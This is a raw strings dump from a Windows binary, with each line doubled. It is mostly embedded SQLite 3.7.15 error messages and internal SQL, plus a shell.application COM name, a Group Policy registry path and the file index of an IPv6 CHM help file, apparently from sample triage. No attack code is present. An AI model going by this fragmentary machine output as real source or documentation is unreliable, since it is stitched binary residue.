sqlite3_wal_autocheckpoint
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_read
sqlite3_blob_write
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_config
sqlite3_vtab_on_conflict
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_BLOB
SQLITE_NULL
SQLITE_NULL
PRIMARY KEY must be unique
PRIMARY KEY must be unique
8.unj
8.unj
sqlite3
sqlite3
sqlite_version
sqlite_version
SQLiteNativeException
SQLiteNativeException
DriverID=SQLite
DriverID=SQLite
shell.application
shell.application
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5A2BF78A-8DE6-4B43-8D7B-AD23782B0E74}User
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5A2BF78A-8DE6-4B43-8D7B-AD23782B0E74}User
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%
P%S%V%Y%\%
P%S%V%Y%\%
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
inflate 1.0.4 Copyright 1995-1996 Mark Adler
8$4,8$4
8$4,8$4
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
3.7.15
SQLITE_
SQLITE_
d-d-d d:d:d
d-d-d d:d:d
d-d-d
d-d-d
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
922337203685477580
922337203685477580
API call with %s database connection pointer
API call with %s database connection pointer
RowKey
RowKey
GetProcessHeap
GetProcessHeap
OsError 0x%x (%u)
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
delayed %dms for lock/sharing conflict
%s-shm
%s-shm
%s\etilqs_
%s\etilqs_
%s\%s
%s\%s
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
cannot limit WAL size: %s
SQLite format 3
SQLite format 3
invalid page number %d
invalid page number %d
2nd reference to page %d
2nd reference to page %d
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
failed to get page %d
failed to get page %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
Page %d:
Page %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On tree page %d cell %d:
On page %d at right child:
On page %d at right child:
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Pointer map page %d is referenced
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
unknown database %s
unknown database %s
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
MJ delete: %s
MJ delete: %s
MJ collide: %s
MJ collide: %s
-mjX9X
-mjX9X
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
abort at %d in [%s]: %s
abort at %d in [%s]: %s
constraint failed at %d in [%s]
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
sqlite_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
database table is locked: %s
database table is locked: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open value of type %s
cannot open virtual table: %s
cannot open virtual table: %s
cannot open view: %s
cannot open view: %s
no such column: "%s"
no such column: "%s"
foreign key
foreign key
indexed
indexed
cannot open %s column for writing
cannot open %s column for writing
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s.%s
%s: %s.%s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many SQL variables
too many SQL variables
too many columns in %s
too many columns in %s
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
misuse of aggregate: %s()
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_parent
sqlite_rename_parent
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
sqlite_
sqlite_
table %s may not be altered
table %s may not be altered
there is already another table or index with this name: %s
there is already another table or index with this name: %s
view %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_altertab_%s
sqlite_stat1
sqlite_stat1
sqlite_stat3
sqlite_stat3
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
invalid name: "%s"
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
Invalid key value
Invalid key value
unable to open database: %s
unable to open database: %s
no such database: %s
no such database: %s
cannot detach database %s
cannot detach database %s
database %s is locked
database %s is locked
sqlite_detach
sqlite_detach
sqlite_attach
sqlite_attach
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
too many columns on %s
too many columns on %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
table "%s" has more than one primary key
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat
table %s may not be dropped
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
views may not be indexed
views may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
there is already a table named %s
there is already a table named %s
index %s already exists
index %s already exists
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
table %s has no column named %s
table %s has no column named %s
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
no such collation sequence: %s
no such collation sequence: %s
table %s may not be modified
table %s may not be modified
cannot modify %s because it is a view
cannot modify %s because it is a view
sqlite_source_id
sqlite_source_id
sqlite_log
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_compileoption_get
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
%d values for %d columns
%d values for %d columns
table %S has no column named %s
table %S has no column named %s
%s.%s may not be NULL
%s.%s may not be NULL
constraint %s failed
constraint %s failed
automatic extension loading failed: %s
automatic extension loading failed: %s
foreign_keys
foreign_keys
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
rekey
rekey
hexkey
hexkey
hexrekey
hexrekey
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
unsupported file format
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
%s:%d
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
no such table: %s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
no such trigger: %S
-- TRIGGER %s
-- TRIGGER %s
no such column: %s
no such column: %s
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s TABLE %s
%s AS %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid>?)
%s (rowid)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
%s (~%lld rows)
at most %d tables in a join
at most %d tables in a join
cannot use index: %s
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
SQL logic error or missing database
unknown operation
unknown operation
large file support is disabled
large file support is disabled
unknown database: %s
unknown database: %s
no such %s mode: %s
no such %s mode: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such vfs: %s
no such vfs: %s
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
no such table column: %s.%s
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
docid INTEGER PRIMARY KEY
docid INTEGER PRIMARY KEY
%z, 'c%d%q'
%z, 'c%d%q'
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
PRAGMA %Q.page_size
PRAGMA %Q.page_size
,%s(x.'c%d%q')
,%s(x.'c%d%q')
FROM '%q'.'%q%s' AS x
FROM '%q'.'%q%s' AS x
,%s(?)
,%s(?)
unrecognized parameter: %s
unrecognized parameter: %s
unrecognized matchinfo: %s
unrecognized matchinfo: %s
unrecognized order: %s
unrecognized order: %s
error parsing prefix parameter: %s
error parsing prefix parameter: %s
missing %s parameter in fts4 constructor
missing %s parameter in fts4 constructor
SELECT %s WHERE rowid = ?
SELECT %s WHERE rowid = ?
malformed MATCH expression: [%s]
malformed MATCH expression: [%s]
SELECT %s ORDER BY rowid %s
SELECT %s ORDER BY rowid %s
illegal first argument to %s
illegal first argument to %s
porter
porter
unknown tokenizer: %s
unknown tokenizer: %s
SELECT %s WHERE rowid=?
SELECT %s WHERE rowid=?
INSERT INTO %Q.'%q_content' VALUES(%s)
INSERT INTO %Q.'%q_content' VALUES(%s)
%s_segments
%s_segments
SELECT %s
SELECT %s
unrecognized matchinfo request: %c
unrecognized matchinfo request: %c
%d %d %d %d
%d %d %d %d
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE x(%s
CREATE TABLE x(%s
%s, %s
%s, %s
%s {%s}
%s {%s}
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
10000000000000000010
10000000000000000010
/#URLSTR
/#URLSTR
/#URLTBL
/#URLTBL
/#WINDOWS
/#WINDOWS
/$WWKeywordLinks/
/$WWKeywordLinks/
/$WWKeywordLinks/BTree
/$WWKeywordLinks/BTree
/$WWKeywordLinks/Data
/$WWKeywordLinks/Data
/$WWKeywordLinks/Map
/$WWKeywordLinks/Map
/$WWKeywordLinks/Property
/$WWKeywordLinks/Property
/compile_date.htm
/compile_date.htm
/IPv6.hhc
/IPv6.hhc
/IPv6P.hhk
/IPv6P.hhk
/sag_IP_v6_add_bibliography.htm
/sag_IP_v6_add_bibliography.htm
/sag_IP_v6_add_standards.htm
/sag_IP_v6_add_standards.htm
/sag_IP_v6_add_topnode.htm
/sag_IP_v6_add_topnode.htm
/sag_IP_v6_add_Utils.htm
/sag_IP_v6_add_Utils.htm
/sag_ip_v6_conf_ia.htm
/sag_ip_v6_conf_ia.htm
/sag_ip_v6_conf_manual.htm
/sag_ip_v6_conf_manual.htm
/sag_IP_v6_imp_aa.htm
/sag_IP_v6_imp_aa.htm
/sag_ip_v6_imp_addr1.htm
/sag_ip_v6_imp_addr1.htm
/sag_ip_v6_imp_addr2.htm
/sag_ip_v6_imp_addr2.htm
/sag_ip_v6_imp_addr3.htm
/sag_ip_v6_imp_addr3.htm
/sag_ip_v6_imp_addr4.htm
/sag_ip_v6_imp_addr4.htm
/sag_ip_v6_imp_addr5.htm
/sag_ip_v6_imp_addr5.htm
/sag_ip_v6_imp_addr6.htm
/sag_ip_v6_imp_addr6.htm
/sag_ip_v6_imp_addr7.htm
/sag_ip_v6_imp_addr7.htm
/sag_IP_v6_imp_addr_node.htm
/sag_IP_v6_imp_addr_node.htm
/sag_IP_v6_imp_addr_topnode.htm
/sag_IP_v6_imp_addr_topnode.htm
/sag_ip_v6_imp_conf1.htm
/sag_ip_v6_imp_conf1.htm
/sag_ip_v6_imp_conf2.htm
/sag_ip_v6_imp_conf2.htm
/sag_ip_v6_imp_conf3.htm
/sag_ip_v6_imp_conf3.htm
/sag_ip_v6_imp_conf4.htm
/sag_ip_v6_imp_conf4.htm
/sag_ip_v6_imp_conf5.htm
/sag_ip_v6_imp_conf5.htm
/sag_ip_v6_imp_conf6.htm
/sag_ip_v6_imp_conf6.htm
/sag_IP_v6_imp_conf_node.htm
/sag_IP_v6_imp_conf_node.htm
/sag_IP_v6_imp_config_items.htm
/sag_IP_v6_imp_config_items.htm
/sag_IP_v6_imp_config_meth.htm
/sag_IP_v6_imp_config_meth.htm
/sag_ip_v6_imp_lab_inf.htm
/sag_ip_v6_imp_lab_inf.htm
/sag_IP_v6_imp_lab_node.htm
/sag_IP_v6_imp_lab_node.htm
/sag_ip_v6_imp_lab_tasks.htm
/sag_ip_v6_imp_lab_tasks.htm
/sag_IP_v6_imp_routing.htm
/sag_IP_v6_imp_routing.htm
f /sag_IP_v6_imp_routing_table.htm
f /sag_IP_v6_imp_routing_table.htm
/sag_IP_v6_imp_topnode.htm
/sag_IP_v6_imp_topnode.htm
/sag_IP_v6_ovr_background.htm
/sag_IP_v6_ovr_background.htm
/sag_IP_v6_ovr_features.htm
/sag_IP_v6_ovr_features.htm
/sag_IP_v6_ovr_secfeatures.htm
/sag_IP_v6_ovr_secfeatures.htm
/sag_IP_v6_ovr_topnode.htm
/sag_IP_v6_ovr_topnode.htm
/sag_IP_v6_ovr_whatis.htm
/sag_IP_v6_ovr_whatis.htm
/sag_ip_v6_pro_conf_node.htm
/sag_ip_v6_pro_conf_node.htm
/sag_ip_v6_pro_diag_ifconf.htm
/sag_ip_v6_pro_diag_ifconf.htm
/sag_ip_v6_pro_diag_nc.htm
/sag_ip_v6_pro_diag_nc.htm
/sag_ip_v6_pro_diag_ping6.htm
/sag_ip_v6_pro_diag_ping6.htm
"/sag_ip_v6_pro_diag_ping6_conn.htm
"/sag_ip_v6_pro_diag_ping6_conn.htm
/sag_ip_v6_pro_diag_rc.htm
/sag_ip_v6_pro_diag_rc.htm
/sag_ip_v6_pro_diag_tracert.htm
/sag_ip_v6_pro_diag_tracert.htm
/sag_IP_v6_pro_DiagNode.htm
/sag_IP_v6_pro_DiagNode.htm
/sag_ip_v6_pro_inst.htm
/sag_ip_v6_pro_inst.htm
/sag_ip_v6_pro_instnode.htm
/sag_ip_v6_pro_instnode.htm
/sag_ip_v6_pro_remove.htm
/sag_ip_v6_pro_remove.htm
/sag_IP_v6_pro_RouteNode.htm
/sag_IP_v6_pro_RouteNode.htm
/sag_ip_v6_pro_rt_add.htm
/sag_ip_v6_pro_rt_add.htm
/sag_ip_v6_pro_rt_enable.htm
/sag_ip_v6_pro_rt_enable.htm
/sag_ip_v6_pro_rt_remove.htm
/sag_ip_v6_pro_rt_remove.htm
/sag_ip_v6_pro_rt_view.htm
/sag_ip_v6_pro_rt_view.htm
/sag_IP_v6_tro_topnode.htm
/sag_IP_v6_tro_topnode.htm
/sag_IP_v6_und_core_topnode.htm
/sag_IP_v6_und_core_topnode.htm
/sag_IP_v6_und_icmp.htm
/sag_IP_v6_und_icmp.htm
/sag_ip_v6_und_ie.htm
/sag_ip_v6_und_ie.htm
/sag_IP_v6_und_ip.htm
/sag_IP_v6_und_ip.htm
/sag_IP_v6_und_MLD.htm
/sag_IP_v6_und_MLD.htm
/sag_IP_v6_und_ND.htm
/sag_IP_v6_und_ND.htm
/sag_IP_v6_und_netapps.htm
/sag_IP_v6_und_netapps.htm
/sag_IP_v6_und_nr.htm
/sag_IP_v6_und_nr.htm
/sag_IP_v6_und_topnode.htm
/sag_IP_v6_und_topnode.htm
/sag_IP_v6_und_winsock.htm
/sag_IP_v6_und_winsock.htm
/sag_IP_v6checklist.htm
/sag_IP_v6checklist.htm
/sag_IP_v6concepts.htm
/sag_IP_v6concepts.htm
/sag_IP_v6procedures.htm
/sag_IP_v6procedures.htm
/sag_IP_v6topnode.htm
/sag_IP_v6topnode.htm
i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
HHA Version 4.74.8702
HHA Version 4.74.8702
MS-ITS:IPv6.chm::/sag_IP_v6topnode.htm
MS-ITS:IPv6.chm::/sag_IP_v6topnode.htm
%-Ub
%-Ub
a}.SU
a}.SU
